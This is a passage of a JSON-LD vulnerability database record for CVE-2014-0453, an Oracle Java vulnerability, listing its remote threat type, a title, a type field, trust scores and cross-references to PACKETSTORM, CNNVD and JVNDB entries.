"CVE-2014-0453" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "CNNVD", "id": "CNNVD-201404-268" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Oracle Java In product Security Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002089" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-268" } ], "trust": 0.6 } }